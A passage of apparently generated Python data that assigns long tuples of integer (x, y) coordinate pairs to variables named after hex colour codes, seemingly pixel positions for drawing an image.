(106, 178), (107, 140), (107, 142), (107, 143), (107, 144), (107, 145), (107, 146), (107, 147), (107, 149), (107, 166), (107, 168), (107, 169), (107, 170), (107, 171), (107, 172), (107, 173), (107, 174), (107, 175), (107, 176), (107, 178), (108, 139), (108, 141), (108, 142), (108, 143), (108, 144), (108, 145), (108, 146), (108, 147), (108, 148), (108, 149), (108, 166), (108, 168), (108, 169), (108, 170), (108, 171), (108, 172), (108, 173), (108, 174), (108, 175), (108, 176), (108, 178), (109, 138), (109, 140), (109, 141), (109, 142), (109, 143), (109, 144), (109, 145), (109, 146), (109, 148), (109, 166), (109, 168), (109, 169), (109, 170), (109, 171), (109, 172), (109, 173), (109, 174), (109, 175), (109, 176), (109, 178), (110, 137), (110, 139), (110, 140), (110, 141), (110, 142), (110, 143), (110, 144), (110, 145), (110, 146), (110, 148), (110, 166),
(110, 168), (110, 169), (110, 170), (110, 171), (110, 172), (110, 173), (110, 174), (110, 175), (110, 176), (110, 178), (111, 138), (111, 139), (111, 140), (111, 141), (111, 142), (111, 143), (111, 144), (111, 145), (111, 146), (111, 147), (111, 148), (111, 166), (111, 168), (111, 169), (111, 170), (111, 171), (111, 172), (111, 173), (111, 174), (111, 175), (111, 177), (112, 135), (112, 138), (112, 139), (112, 140), (112, 141), (112, 142), (112, 143), (112, 144), (112, 145), (112, 147), (112, 166), (112, 168), (112, 169), (112, 170), (112, 171), (112, 172), (112, 173), (112, 174), (112, 176), (113, 134), (113, 140), (113, 141), (113, 142), (113, 143), (113, 144), (113, 145), (113, 147), (113, 166), (113, 168), (113, 169), (113, 170), (113, 171), (113, 172), (113, 173), (113, 174), (113, 176), (114, 133), (114, 135), (114, 136), (114, 137), (114, 138),
(114, 141), (114, 142), (114, 143), (114, 144), (114, 146), (114, 165), (114, 167), (114, 168), (114, 169), (114, 170), (114, 171), (114, 172), (114, 173), (114, 175), (115, 140), (115, 142), (115, 143), (115, 144), (115, 146), (115, 164), (115, 171), (115, 172), (115, 173), (115, 175), (116, 141), (116, 143), (116, 144), (116, 145), (116, 147), (116, 163), (116, 165), (116, 166), (116, 167), (116, 168), (116, 169), (116, 170), (116, 172), (116, 173), (116, 174), (116, 176), (117, 142), (117, 147), (117, 171), (117, 173), (117, 174), (117, 176), (118, 143), (118, 145), (118, 147), (118, 172), (118, 175), (118, 177), (119, 173), (119, 178), (120, 175), )
coordinates_5FCC60 = ((126, 175),
(127, 173), (127, 174), (127, 177), (128, 143), (128, 145), (128, 146), (128, 147), (128, 149), (128, 163), (128, 165), (128, 166), (128, 167), (128, 168), (128, 169), (128, 170), (128, 171), (128, 172), (128, 175), (128, 178), (129, 141), (129, 149), (129, 164), (129, 173), (129, 174), (129, 175), (129, 176), (129, 178), (130, 139), (130, 143), (130, 144), (130, 145), (130, 146), (130, 147), (130, 149), (130, 164), (130, 166), (130, 167), (130, 168), (130, 169), (130, 170), (130, 171), (130, 172), (130, 173), (130, 174), (130, 175), (130, 176), (130, 178), (131, 137), (131, 141), (131, 142), (131, 143), (131, 144), (131, 145), (131, 146), (131, 147), (131, 149), (131, 165), (131, 167), (131, 168), (131, 169), (131, 170), (131, 171), (131, 172), (131, 173), (131, 174), (131, 175), (131, 176), (131, 178), (132, 134), (132, 135), (132, 139), (132, 140),
(132, 141), (132, 142), (132, 143), (132, 144), (132, 145), (132, 146), (132, 148), (132, 165), (132, 167), (132, 168), (132, 169), (132, 170), (132, 171), (132, 172), (132, 173), (132, 174), (132, 175), (132, 176), (132, 178), (133, 135), (133, 137), (133, 138), (133, 139), (133, 140), (133, 141), (133, 142), (133, 143), (133, 144), (133, 145), (133, 146), (133, 148), (133, 166), (133, 168), (133, 169), (133, 170), (133, 171), (133, 172), (133, 173), (133, 174), (133, 175), (133, 176), (133, 178), (134, 136), (134, 138), (134, 139), (134, 140), (134, 141), (134, 142), (134, 143), (134, 144), (134, 145), (134, 146), (134, 148), (134, 166), (134, 168), (134, 169), (134, 170), (134, 171), (134, 172), (134, 173), (134, 174), (134, 175), (134, 177), (135, 137), (135, 139), (135, 140), (135, 141), (135, 142), (135, 143), (135, 144), (135, 145), (135, 147),
(135, 166), (135, 168), (135, 169), (135, 170), (135, 171), (135, 172), (135, 173), (135, 174), (135, 175), (135, 177), (136, 138), (136, 140), (136, 141), (136, 142), (136, 143), (136, 144), (136, 145), (136, 147), (136, 166), (136, 168), (136, 169), (136, 170), (136, 171), (136, 172), (136, 173), (136, 174), (136, 175), (136, 177), (137, 139), (137, 141), (137, 142), (137, 143), (137, 144), (137, 145), (137, 146), (137, 148), (137, 166), (137, 168), (137, 169), (137, 170), (137, 171), (137, 172), (137, 173), (137, 174), (137, 176), (138, 139), (138, 141), (138, 142), (138, 143), (138, 144), (138, 145), (138, 146), (138, 147), (138, 149), (138, 166), (138, 168), (138, 169), (138, 170), (138, 171), (138, 172), (138, 173), (138, 174), (138, 176), (139, 140), (139, 142), (139, 143), (139, 144), (139, 145), (139, 146), (139, 147), (139, 149), (139, 166),
(139, 168), (139, 169), (139, 170), (139, 171), (139, 172), (139, 173), (139, 174), (139, 175), (139, 177), (140, 141), (140, 143), (140, 144), (140, 145), (140, 146), (140, 147), (140, 149), (140, 166), (140, 168), (140, 169), (140, 170), (140, 171), (140, 172), (140, 173), (140, 174), (140, 175), (140, 176), (140, 178), (141, 142), (141, 144), (141, 145), (141, 146), (141, 148), (141, 166), (141, 168), (141, 169), (141, 170), (141, 171), (141, 172), (141, 173), (141, 174), (141, 175), (141, 176), (141, 177), (141, 179), (142, 142), (142, 144), (142, 145), (142, 146), (142, 148), (142, 153), (142, 154), (142, 166), (142, 168), (142, 169), (142, 170), (142, 171), (142, 172), (142, 173), (142, 174), (142, 175), (142, 176), (142, 177), (142, 179), (143, 143), (143, 145), (143, 146), (143, 148), (143, 155), (143, 167), (143, 169), (143, 170), (143, 171),
(143, 172), (143, 173), (143, 174), (143, 175), (143, 176), (143, 177), (143, 179), (144, 143), (144, 145), (144, 146), (144, 148), (144, 152), (144, 155), (144, 167), (144, 169), (144, 170), (144, 171), (144, 172), (144, 173), (144, 174), (144, 175), (144, 176), (144, 177), (144, 179), (145, 144), (145, 146), (145, 148), (145, 151), (145, 153), (145, 154), (145, 156), (145, 167), (145, 169), (145, 170), (145, 171), (145, 172), (145, 173), (145, 174), (145, 175), (145, 176), (145, 177), (145, 179), (146, 145), (146, 147), (146, 148), (146, 152), (146, 153), (146, 154), (146, 155), (146, 156), (146, 168), (146, 170), (146, 171), (146, 172), (146, 173), (146, 174), (146, 175), (146, 176), (146, 177), (146, 179), (147, 146), (147, 148), (147, 149), (147, 151), (147, 152), (147, 153), (147, 154), (147, 155), (147, 157), (147, 169), (147, 171), (147, 172),
(147, 173), (147, 174), (147, 175), (147, 176), (147, 177), (147, 179), (148, 146), (148, 148), (148, 150), (148, 151), (148, 152), (148, 153), (148, 154), (148, 155), (148, 157), (148, 170), (148, 172), (148, 173), (148, 174), (148, 175), (148, 176), (148, 177), (148, 178), (148, 179), (149, 146), (149, 148), (149, 149), (149, 150), (149, 151), (149, 152), (149, 153), (149, 154), (149, 155), (149, 156), (149, 158), (149, 171), (149, 173), (149, 174), (149, 175), (149, 176), (149, 178), (150, 146), (150, 148), (150, 149), (150, 150), (150, 151), (150, 152), (150, 153), (150, 154), (150, 155), (150, 156), (150, 158), (150, 172), (150, 174), (150, 175), (150, 176), (150, 178), (151, 146), (151, 148), (151, 149), (151, 150), (151, 151), (151, 152), (151, 153), (151, 154), (151, 155), (151, 157), (151, 167), (151, 173), (151, 175), (151, 176), (151, 178),
(152, 147), (152, 148), (152, 149), (152, 150), (152, 151), (152, 152), (152, 153), (152, 154), (152, 155), (152, 157), (152, 167), (152, 168), (152, 173), (152, 175), (152, 176), (152, 178), (153, 147), (153, 149), (153, 150), (153, 151), (153, 152), (153, 153), (153, 154), (153, 155), (153, 157), (153, 167), (153, 169), (153, 173), (153, 174), (153, 175), (153, 176), (153, 178), (154, 147), (154, 149), (154, 150), (154, 151), (154, 152), (154, 153), (154, 154), (154, 155), (154, 157), (154, 167), (154, 170), (154, 171), (154, 172), (154, 173), (154, 174), (154, 175), (154, 176), (154, 177), (154, 178), (155, 148), (155, 150), (155, 151), (155, 152), (155, 153), (155, 154), (155, 156), (155, 162), (155, 167), (155, 169), (155, 172), (155, 173), (155, 174), (155, 175), (155, 176), (155, 177), (155, 178), (156, 148), (156, 150), (156, 151), (156, 152),
(156, 153), (156, 154), (156, 156), (156, 161), (156, 162), (156, 168), (156, 170), (156, 171), (156, 172), (156, 173), (156, 174), (156, 175), (156, 177), (157, 149), (157, 151), (157, 152), (157, 153), (157, 155), (157, 161), (157, 162), (157, 168), (157, 170), (157, 171), (157, 172), (157, 173), (157, 174), (157, 175), (157, 176), (157, 177), (158, 149), (158, 151), (158, 152), (158, 153), (158, 155), (158, 161), (158, 162), (158, 169), (158, 171), (158, 172), (158, 173), (158, 174), (158, 175), (158, 177), (159, 150), (159, 152), (159, 153), (159, 155), (159, 160), (159, 163), (159, 169), (159, 171), (159, 172), (159, 173), (159, 174), (159, 175), (159, 177), (160, 150), (160, 152), (160, 153), (160, 155), (160, 160), (160, 162), (160, 164), (160, 168), (160, 170), (160, 171), (160, 172), (160, 173), (160, 174), (160, 176), (161, 150), (161, 152),
(161, 153), (161, 154), (161, 156), (161, 160), (161, 162), (161, 163), (161, 165), (161, 166), (161, 167), (161, 168), (161, 169), (161, 170), (161, 171), (161, 172), (161, 173), (161, 175), (162, 151), (162, 153), (162, 154), (162, 155), (162, 156), (162, 160), (162, 162), (162, 163), (162, 164), (162, 168), (162, 169), (162, 170), (162, 171), (162, 172), (162, 174), (163, 151), (163, 153), (163, 155), (163, 160), (163, 162), (163, 163), (163, 164), (163, 165), (163, 166), (163, 167), (163, 168), (163, 169), (163, 170), (163, 171), (163, 172), (163, 174), (164, 152), (164, 155), (164, 159), (164, 161), (164, 162), (164, 163), (164, 164), (164, 165), (164, 166), (164, 167), (164, 168), (164, 169), (164, 170), (164, 171), (164, 172), (164, 174), (165, 152), (165, 155), (165, 159), (165, 161), (165, 162), (165, 163), (165, 164), (165, 165), (165, 166),
(165, 167), (165, 168), (165, 169), (165, 170), (165, 171), (165, 174), (166, 152), (166, 154), (166, 155), (166, 159), (166, 161), (166, 162), (166, 163), (166, 164), (166, 165), (166, 166), (166, 167), (166, 168), (166, 169), (166, 170), (166, 173), (167, 152), (167, 154), (167, 155), (167, 158), (167, 159), (167, 160), (167, 161), (167, 162), (167, 163), (167, 164), (167, 165), (167, 166), (167, 167), (167, 171), (168, 152), (168, 154), (168, 155), (168, 156), (168, 158), (168, 159), (168, 160), (168, 161), (168, 162), (168, 163), (168, 164), (168, 165), (168, 166), (168, 170), (169, 152), (169, 155), (169, 156), (169, 158), (169, 159), (169, 160), (169, 161), (169, 162), (169, 163), (169, 164), (169, 165), (169, 167), (170, 154), (170, 155), (170, 156), (170, 157), (170, 158), (170, 159), (170, 160), (170, 161), (170, 162), (170, 163), (170, 164),
(170, 166), (171, 155), (171, 157), (171, 158), (171, 159), (171, 165), (172, 155), (172, 157), (172, 160), (172, 161), (172, 162), (172, 164), (173, 155), (173, 159), (174, 156), )
coordinates_F4DEB3 = ((129, 67),
(129, 68), (130, 67), (130, 68), (131, 68), (131, 69), (132, 68), (132, 70), (133, 69), (133, 71), (134, 70), (134, 72), (135, 71), (135, 74), (136, 71), (136, 75), (137, 70), (137, 75), (138, 69), (138, 71), (138, 72), (138, 74), (138, 106), (139, 68), (139, 81), (139, 83), (139, 84), (139, 86), (139, 104), (139, 107), (140, 68), (140, 70), (140, 79), (140, 88), (141, 70), (141, 78), (141, 81), (141, 82), (141, 83), (141, 84), (141, 85), (141, 86), (141, 89), (141, 105), (141, 108), (142, 69), (142, 70), (142, 77), (142, 79), (142, 81), (142, 82), (142, 83), (142, 90), (142, 106), (142, 108), (143, 69), (143, 71), (143, 77), (143, 81), (143, 83), (143, 84), (143, 85), (143, 86), (143, 87), (143, 88), (143, 90), (144, 70), (144, 76), (144, 77), (144, 81), (144, 83), (145, 71), (145, 72),
(145, 76), (145, 77), (145, 81), (145, 83), (146, 71), (146, 74), (146, 76), (146, 81), (146, 83), (147, 72), (147, 76), (147, 82), (147, 83), (148, 73), (148, 75), (148, 82), (148, 84), (149, 82), (149, 84), )
coordinates_26408B = ((123, 103),
(123, 105), (123, 106), (123, 107), (123, 108), (123, 109), (123, 110), (123, 111), (123, 112), (123, 113), (124, 80), (124, 82), (124, 83), (124, 85), (124, 86), (124, 89), (124, 90), (124, 91), (124, 92), (124, 93), (124, 94), (124, 95), (124, 96), (124, 98), (124, 102), (124, 110), (124, 111), (124, 112), (124, 113), (124, 114), (124, 115), (124, 116), (124, 117), (124, 118), (124, 119), (124, 121), (125, 76), (125, 77), (125, 78), (125, 79), (125, 91), (125, 94), (125, 100), (125, 103), (125, 106), (125, 107), (125, 108), (125, 109), (125, 116), (125, 122), (126, 70), (126, 72), (126, 73), (126, 74), (126, 75), (126, 82), (126, 83), (126, 84), (126, 85), (126, 86), (126, 89), (126, 91), (126, 95), (126, 97), (126, 98), (126, 103), (126, 117), (126, 119), (126, 120), (126, 122), (127, 69), (127, 76), (127, 77),
(127, 78), (127, 80), (127, 84), (127, 85), (127, 86), (127, 87), (127, 91), (127, 96), (127, 98), (127, 99), (127, 100), (127, 102), (127, 117), (127, 118), (127, 121), (128, 69), (128, 71), (128, 72), (128, 73), (128, 74), (128, 75), (128, 76), (128, 77), (128, 79), (128, 84), (128, 86), (128, 89), (128, 91), (128, 97), (128, 99), (128, 100), (128, 102), (128, 114), (128, 116), (128, 120), (129, 70), (129, 72), (129, 73), (129, 74), (129, 75), (129, 76), (129, 78), (129, 84), (129, 86), (129, 90), (129, 91), (129, 98), (129, 100), (129, 102), (129, 111), (129, 113), (129, 118), (130, 71), (130, 77), (130, 84), (130, 86), (130, 87), (130, 90), (130, 91), (130, 99), (130, 102), (130, 110), (130, 114), (130, 116), (131, 71), (131, 72), (131, 74), (131, 75), (131, 77), (131, 84), (131, 87), (131, 91),
(131, 100), (131, 102), (131, 110), (131, 112), (131, 113), (131, 115), (132, 85), (132, 87), (132, 91), (132, 101), (132, 110), (132, 112), (132, 113), (132, 115), (133, 87), (133, 89), (133, 91), (133, 110), (133, 112), (133, 113), (133, 115), (134, 113), (134, 115), (135, 111), (135, 113), (135, 115), (136, 112), (136, 114), (136, 116), (137, 113), (137, 115), (137, 116), (138, 114), (138, 117), (139, 115), (139, 118), (140, 115), (140, 118), (141, 115), (141, 118), (142, 115), (142, 118), (143, 114), (143, 117), (144, 114), (144, 116), (145, 114), (145, 116), (146, 115), )
coordinates_F5DEB3 = ((90, 82),
(90, 84), (90, 85), (90, 86), (90, 87), (90, 88), (90, 89), (91, 74), (91, 75), (91, 81), (91, 85), (91, 90), (91, 92), (92, 73), (92, 76), (92, 77), (92, 80), (92, 83), (92, 87), (92, 89), (92, 92), (93, 73), (93, 78), (93, 79), (93, 82), (93, 88), (93, 90), (93, 92), (94, 72), (94, 73), (94, 74), (94, 77), (94, 81), (94, 88), (94, 91), (95, 72), (95, 73), (95, 79), (95, 80), (95, 87), (95, 90), (96, 72), (96, 73), (96, 86), (96, 88), (96, 90), (97, 72), (97, 73), (97, 85), (97, 87), (97, 89), (98, 72), (98, 73), (98, 84), (98, 86), (98, 87), (98, 89), (99, 72), (99, 74), (99, 83), (99, 85), (99, 86), (99, 87), (99, 90), (100, 73), (100, 75), (100, 83), (100, 88), (100, 89), (100, 90), (100, 91), (100, 92), (100, 94),
(101, 74), (101, 76), (101, 83), (101, 85), (101, 86), (102, 74), (102, 77), (103, 68), (103, 70), (103, 74), (103, 76), (103, 78), (104, 68), (104, 71), (104, 72), (104, 73), (104, 75), (104, 76), (104, 77), (104, 80), (105, 68), (105, 72), (105, 73), (105, 74), (105, 78), (105, 81), (106, 67), (106, 70), (106, 75), (106, 76), (106, 82), (107, 67), (107, 69), (107, 78), (107, 79), (107, 81), (108, 67), (108, 68), (109, 67), (109, 68), (110, 66), (110, 68), (111, 66), (111, 68), (112, 67), (112, 69), (112, 73), (113, 68), (113, 71), (113, 73), (114, 69), (114, 72), (115, 69), (115, 72), (116, 71), )
coordinates_016400 = ((127, 126),
(127, 127), (128, 128), (129, 127), (129, 129), (130, 128), (130, 130), (132, 132), (133, 131), (133, 133), (134, 131), (134, 132), (134, 134), (135, 132), (135, 134), (136, 132), (136, 135), (137, 132), (137, 134), (137, 136), (138, 132), (138, 137), (139, 133), (139, 138), (140, 136), (140, 139), (141, 137), (141, 139), (142, 137), (142, 140), (143, 136), (144, 135), (144, 139), (144, 141), (145, 134), (145, 137), (146, 133), (146, 136), (147, 132), (147, 135), (148, 131), (148, 134), (149, 130), (149, 133), (150, 131), (150, 132), )
coordinates_B8EDC2 = ((116, 131),
(116, 133), (116, 134), (116, 135), (116, 136), (116, 138), (117, 130), (117, 140), (118, 130), (118, 132), (118, 133), (118, 134), (118, 135), (118, 136), (118, 137), (118, 138), (118, 141), (119, 128), (119, 130), (119, 131), (119, 132), (119, 133), (119, 134), (119, 135), (119, 136), (119, 137), (119, 138), (119, 139), (120, 127), (120, 130), (120, 131), (120, 132), (120, 133), (120, 134), (120, 135), (120, 136), (120, 137), (120, 138), (120, 139), (120, 140), (120, 143), (121, 127), (121, 129), (121, 130), (121, 131), (121, 132), (121, 133), (121, 134), (121, 135), (121, 136), (121, 137), (121, 138), (121, 139), (121, 140), (121, 141), (121, 144), (122, 127), (122, 129), (122, 130), (122, 131), (122, 132), (122, 133), (122, 134), (122, 135), (122, 136), (122, 137), (122, 138), (122, 139), (122, 140), (122, 141), (122, 142), (122, 144), (123, 127),
(123, 129), (123, 130), (123, 131), (123, 132), (123, 133), (123, 134), (123, 135), (123, 136), (123, 137), (123, 138), (123, 139), (123, 140), (123, 141), (123, 142), (123, 144), (124, 128), (124, 129), (124, 130), (124, 131), (124, 132), (124, 133), (124, 134), (124, 135), (124, 136), (124, 137), (124, 138), (124, 139), (124, 140), (124, 141), (124, 142), (124, 144), (125, 127), (125, 130), (125, 131), (125, 132), (125, 133), (125, 134), (125, 135), (125, 136), (125, 137), (125, 138), (125, 139), (125, 140), (125, 141), (125, 144), (126, 128), (126, 131), (126, 132), (126, 133), (126, 134), (126, 135), (126, 136), (126, 137), (126, 138), (126, 139), (126, 142), (126, 143), (127, 130), (127, 132), (127, 133), (127, 134), (127, 135), (127, 136), (127, 137), (127, 141), (128, 131), (128, 133), (128, 134), (128, 135), (128, 139), (129, 132), (129, 137),
(130, 133), (130, 135), )
coordinates_CC5B45 = ((151, 78),
(151, 80), (151, 81), (151, 82), (151, 83), (151, 84), (151, 85), (152, 78), (153, 78), (153, 80), (153, 81), (153, 82), (153, 84), (154, 78), (154, 80), (154, 81), (154, 82), (154, 84), (155, 78), (155, 80), (155, 81), (155, 82), (155, 84), (156, 79), (156, 81), (156, 82), (156, 84), (157, 79), (157, 81), (157, 82), (157, 84), (157, 90), (157, 91), (157, 100), (157, 113), (157, 114), (157, 116), (158, 79), (158, 81), (158, 82), (158, 84), (158, 88), (158, 92), (158, 100), (158, 113), (158, 117), (159, 80), (159, 82), (159, 83), (159, 84), (159, 87), (159, 90), (159, 92), (159, 100), (159, 113), (159, 115), (159, 116), (159, 118), (160, 80), (160, 82), (160, 83), (160, 84), (160, 85), (160, 88), (160, 89), (160, 90), (160, 92), (160, 100), (160, 112), (160, 113), (160, 115), (160, 116), (160, 118),
(161, 81), (161, 83), (161, 84), (161, 85), (161, 86), (161, 87), (161, 88), (161, 89), (161, 90), (161, 92), (161, 100), (161, 104), (161, 112), (161, 114), (161, 115), (161, 116), (161, 118), (162, 81), (162, 84), (162, 85), (162, 86), (162, 87), (162, 88), (162, 89), (162, 91), (162, 101), (162, 105), (162, 112), (162, 114), (162, 115), (162, 116), (162, 118), (163, 82), (163, 84), (163, 85), (163, 86), (163, 87), (163, 88), (163, 90), (163, 103), (163, 104), (163, 108), (163, 111), (163, 113), (163, 114), (163, 115), (163, 116), (163, 118), (164, 83), (164, 85), (164, 86), (164, 87), (164, 89), (164, 105), (164, 106), (164, 111), (164, 112), (164, 113), (164, 114), (164, 115), (164, 116), (164, 118), (165, 84), (165, 86), (165, 88), (165, 111), (165, 112), (165, 113), (165, 114), (165, 115), (165, 117), (166, 84),
(166, 87), (166, 94), (166, 109), (166, 111), (166, 112), (166, 113), (166, 114), (166, 115), (166, 116), (166, 117), (167, 84), (167, 86), (167, 87), (167, 92), (167, 93), (167, 110), (167, 112), (167, 113), (167, 114), (167, 115), (167, 117), (168, 85), (168, 87), (168, 88), (168, 89), (168, 90), (168, 93), (168, 110), (168, 112), (168, 113), (168, 114), (168, 115), (168, 117), (169, 86), (169, 88), (169, 91), (169, 93), (169, 104), (169, 105), (169, 110), (169, 112), (169, 113), (169, 114), (169, 115), (169, 117), (170, 89), (170, 90), (170, 91), (170, 93), (170, 101), (170, 103), (170, 106), (170, 107), (170, 108), (170, 109), (170, 110), (170, 111), (170, 112), (170, 113), (170, 114), (170, 115), (170, 117), (171, 90), (171, 91), (171, 92), (171, 93), (171, 94), (171, 95), (171, 98), (171, 99), (171, 100), (171, 104),
(171, 105), (171, 110), (171, 111), (171, 112), (171, 113), (171, 114), (171, 115), (171, 117), (172, 89), (172, 97), (172, 101), (172, 102), (172, 103), (172, 104), (172, 109), (172, 110), (172, 111), (172, 112), (172, 113), (172, 114), (172, 115), (172, 117), (173, 90), (173, 92), (173, 93), (173, 94), (173, 95), (173, 96), (173, 99), (173, 100), (173, 101), (173, 102), (173, 105), (173, 109), (173, 110), (173, 111), (173, 112), (173, 113), (173, 114), (173, 115), (173, 117), (174, 98), (174, 103), (174, 104), (174, 109), (174, 111), (174, 112), (174, 113), (174, 114), (174, 115), (174, 117), (175, 100), (175, 102), (175, 109), (175, 111), (175, 112), (175, 113), (175, 114), (175, 115), (175, 117), (176, 109), (176, 111), (176, 112), (176, 113), (176, 114), (176, 115), (176, 117), (177, 110), (177, 112), (177, 113), (177, 114), (177, 115),
(178, 110), (178, 112), (178, 113), (178, 114), (178, 117), (179, 110), (179, 115), (180, 112), )
coordinates_27408B = ((100, 112),
(100, 114), (100, 116), (101, 111), (101, 117), (102, 110), (102, 112), (102, 113), (102, 114), (102, 115), (102, 118), (103, 110), (103, 112), (103, 113), (103, 114), (103, 115), (103, 116), (103, 117), (103, 119), (103, 120), (103, 122), (104, 109), (104, 111), (104, 112), (104, 113), (104, 114), (104, 115), (104, 116), (104, 117), (104, 118), (104, 122), (105, 109), (105, 111), (105, 112), (105, 113), (105, 114), (105, 115), (105, 116), (105, 117), (105, 118), (105, 119), (105, 120), (105, 122), (106, 109), (106, 111), (106, 112), (106, 113), (106, 114), (106, 115), (106, 116), (106, 117), (106, 118), (106, 119), (106, 120), (106, 122), (107, 109), (107, 111), (107, 112), (107, 113), (107, 114), (107, 115), (107, 116), (107, 117), (107, 118), (107, 119), (107, 120), (107, 122), (108, 109), (108, 111), (108, 114), (108, 115), (108, 116), (108, 117),
(108, 118), (108, 119), (108, 120), (108, 122), (109, 89), (109, 91), (109, 93), (109, 109), (109, 112), (109, 113), (109, 116), (109, 117), (109, 118), (109, 119), (109, 120), (109, 122), (110, 89), (110, 93), (110, 110), (110, 111), (110, 114), (110, 117), (110, 118), (110, 119), (110, 120), (110, 122), (111, 89), (111, 91), (111, 93), (111, 101), (111, 103), (111, 110), (111, 116), (111, 118), (111, 119), (111, 120), (111, 122), (112, 79), (112, 82), (112, 89), (112, 91), (112, 92), (112, 94), (112, 100), (112, 104), (112, 117), (112, 119), (112, 120), (112, 122), (113, 79), (113, 83), (113, 89), (113, 91), (113, 92), (113, 94), (113, 99), (113, 101), (113, 102), (113, 105), (113, 118), (113, 120), (113, 122), (114, 79), (114, 81), (114, 82), (114, 85), (114, 89), (114, 91), (114, 92), (114, 94), (114, 99), (114, 101),
(114, 102), (114, 103), (114, 105), (114, 119), (114, 122), (115, 79), (115, 80), (115, 81), (115, 82), (115, 83), (115, 84), (115, 86), (115, 87), (115, 88), (115, 89), (115, 90), (115, 91), (115, 92), (115, 94), (115, 99), (115, 101), (115, 102), (115, 103), (115, 104), (115, 106), (115, 119), (115, 122), (116, 80), (116, 82), (116, 83), (116, 84), (116, 85), (116, 89), (116, 90), (116, 91), (116, 92), (116, 94), (116, 99), (116, 101), (116, 102), (116, 103), (116, 104), (116, 105), (116, 107), (116, 120), (116, 122), (117, 73), (117, 74), (117, 81), (117, 83), (117, 84), (117, 85), (117, 86), (117, 87), (117, 88), (117, 89), (117, 90), (117, 91), (117, 92), (117, 94), (117, 98), (117, 100), (117, 101), (117, 104), (117, 105), (117, 106), (117, 109), (117, 110), (117, 111), (117, 112), (117, 113), (117, 114),
(117, 115), (117, 116), (117, 120), (117, 122), (118, 72), (118, 75), (118, 81), (118, 83), (118, 84), (118, 85), (118, 86), (118, 87), (118, 88), (118, 89), (118, 92), (118, 93), (118, 95), (118, 98), (118, 100), (118, 102), (118, 104), (118, 105), (118, 106), (118, 107), (118, 111), (118, 122), (119, 73), (119, 76), (119, 80), (119, 81), (119, 82), (119, 83), (119, 84), (119, 85), (119, 86), (119, 87), (119, 88), (119, 89), (119, 91), (119, 92), (119, 93), (119, 95), (119, 98), (119, 100), (119, 104), (119, 115), (119, 116), (119, 117), (119, 118), (119, 119), (119, 121), (120, 74), (120, 78), (120, 79), (120, 81), (120, 82), (120, 83), (120, 84), (120, 85), (120, 86), (120, 87), (120, 89), (120, 92), (120, 97), (120, 98), (120, 100), (120, 104), (120, 106), (120, 107), (120, 108), (120, 109), (120, 110),
(120, 111), (120, 112), (120, 113), (121, 76), (121, 77), (121, 78), (121, 79), (121, 80), (121, 81), (121, 89), (121, 92), (121, 93), (121, 94), (121, 95), (121, 96), (121, 100), (122, 82), (122, 83), (122, 84), (122, 87), (122, 88), (122, 98), (122, 99), )
coordinates_006400 = ((94, 132),
(95, 132), (96, 132), (96, 133), (97, 132), (97, 133), (98, 134), (99, 135), (100, 136), (101, 138), (102, 136), (102, 139), (102, 140), (102, 141), (103, 136), (103, 138), (103, 140), (104, 135), (104, 136), (104, 137), (104, 138), (104, 140), (105, 133), (105, 136), (105, 137), (105, 139), (106, 133), (106, 135), (106, 136), (106, 138), (107, 133), (107, 135), (107, 137), (108, 133), (108, 136), (109, 133), (109, 136), (110, 133), (110, 135), (111, 134), (112, 131), (112, 133), (113, 130), (113, 132), (114, 128), (114, 131), (115, 127), (115, 129), (116, 127), (116, 128), (117, 126), )
coordinates_E1B7E7 = ((118, 160),
(118, 161), (118, 162), (118, 163), (118, 164), (118, 165), (118, 166), (118, 167), (118, 169), (119, 157), (119, 158), (119, 171), (120, 156), (120, 159), (120, 160), (120, 161), (120, 162), (120, 163), (120, 164), (120, 165), (120, 166), (120, 167), (120, 168), (120, 169), (120, 171), (121, 158), (121, 159), (121, 160), (121, 161), (121, 162), (121, 163), (121, 164), (121, 165), (121, 166), (121, 167), (121, 168), (121, 169), (121, 171), (122, 156), (122, 158), (122, 159), (122, 160), (122, 161), (122, 162), (122, 163), (122, 164), (122, 165), (122, 166), (122, 167), (122, 168), (122, 169), (122, 170), (122, 172), (123, 158), (123, 159), (123, 160), (123, 161), (123, 162), (123, 163), (123, 164), (123, 165), (123, 166), (123, 167), (123, 168), (123, 169), (123, 170), (123, 172), (124, 156), (124, 159), (124, 160), (124, 161), (124, 162), (124, 163),
(124, 164), (124, 165), (124, 166), (124, 167), (124, 168), (124, 171), (125, 157), (125, 169), (125, 171), (126, 159), (126, 161), (126, 162), (126, 163), (126, 164), (126, 165), (126, 166), (126, 167), (126, 168), )
coordinates_CD5B45 = ((64, 114),
(64, 115), (64, 116), (64, 117), (64, 118), (64, 119), (64, 120), (64, 121), (64, 122), (64, 124), (65, 110), (65, 112), (65, 125), (66, 106), (66, 109), (66, 114), (66, 117), (66, 118), (66, 119), (66, 120), (66, 122), (66, 123), (66, 125), (67, 97), (67, 99), (67, 100), (67, 101), (67, 102), (67, 103), (67, 104), (67, 105), (67, 107), (67, 110), (67, 111), (67, 112), (67, 113), (67, 114), (67, 115), (67, 116), (67, 121), (67, 124), (67, 125), (68, 96), (68, 106), (68, 109), (68, 110), (68, 111), (68, 112), (68, 114), (68, 117), (68, 118), (68, 120), (68, 125), (69, 95), (69, 99), (69, 100), (69, 102), (69, 103), (69, 104), (69, 105), (69, 106), (69, 107), (69, 108), (69, 109), (69, 110), (69, 111), (69, 112), (69, 114), (70, 94), (70, 97), (70, 101), (70, 103), (70, 104),
(70, 105), (70, 106), (70, 107), (70, 108), (70, 109), (70, 110), (70, 111), (70, 112), (70, 113), (70, 114), (71, 92), (71, 96), (71, 102), (71, 104), (71, 105), (71, 106), (71, 107), (71, 108), (71, 109), (71, 110), (71, 111), (71, 113), (72, 95), (72, 102), (72, 104), (72, 105), (72, 106), (72, 107), (72, 108), (72, 109), (72, 110), (72, 111), (72, 113), (73, 91), (73, 93), (73, 95), (73, 102), (73, 104), (73, 105), (73, 106), (73, 107), (73, 108), (73, 109), (73, 110), (73, 111), (73, 113), (73, 114), (73, 118), (73, 119), (74, 86), (74, 87), (74, 91), (74, 93), (74, 94), (74, 96), (74, 102), (74, 104), (74, 105), (74, 106), (74, 107), (74, 108), (74, 109), (74, 110), (74, 111), (74, 112), (74, 113), (74, 114), (74, 117), (74, 120), (75, 85), (75, 88), (75, 91),
